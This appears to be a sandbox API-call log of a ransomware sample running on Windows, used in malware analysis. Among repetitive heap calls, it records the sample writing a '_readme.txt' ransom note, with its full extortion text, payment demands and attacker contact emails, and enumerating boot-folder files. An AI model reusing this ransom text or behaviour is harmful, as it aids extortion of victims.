hHeap=0x6a0000) returned 1 [0175.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.328] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0175.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.329] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0175.329] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.329] PathFindFileNameW (pszPath="") returned="" [0175.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.329] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.329] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0175.329] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0175.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.330] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.330] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0175.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.330] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0175.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.330] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.331] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0175.331] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0175.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.332] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*" (normalized: "c:\\boot\\zh-cn\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.333] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.333] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0175.333] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0175.333] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0175.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0175.334] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 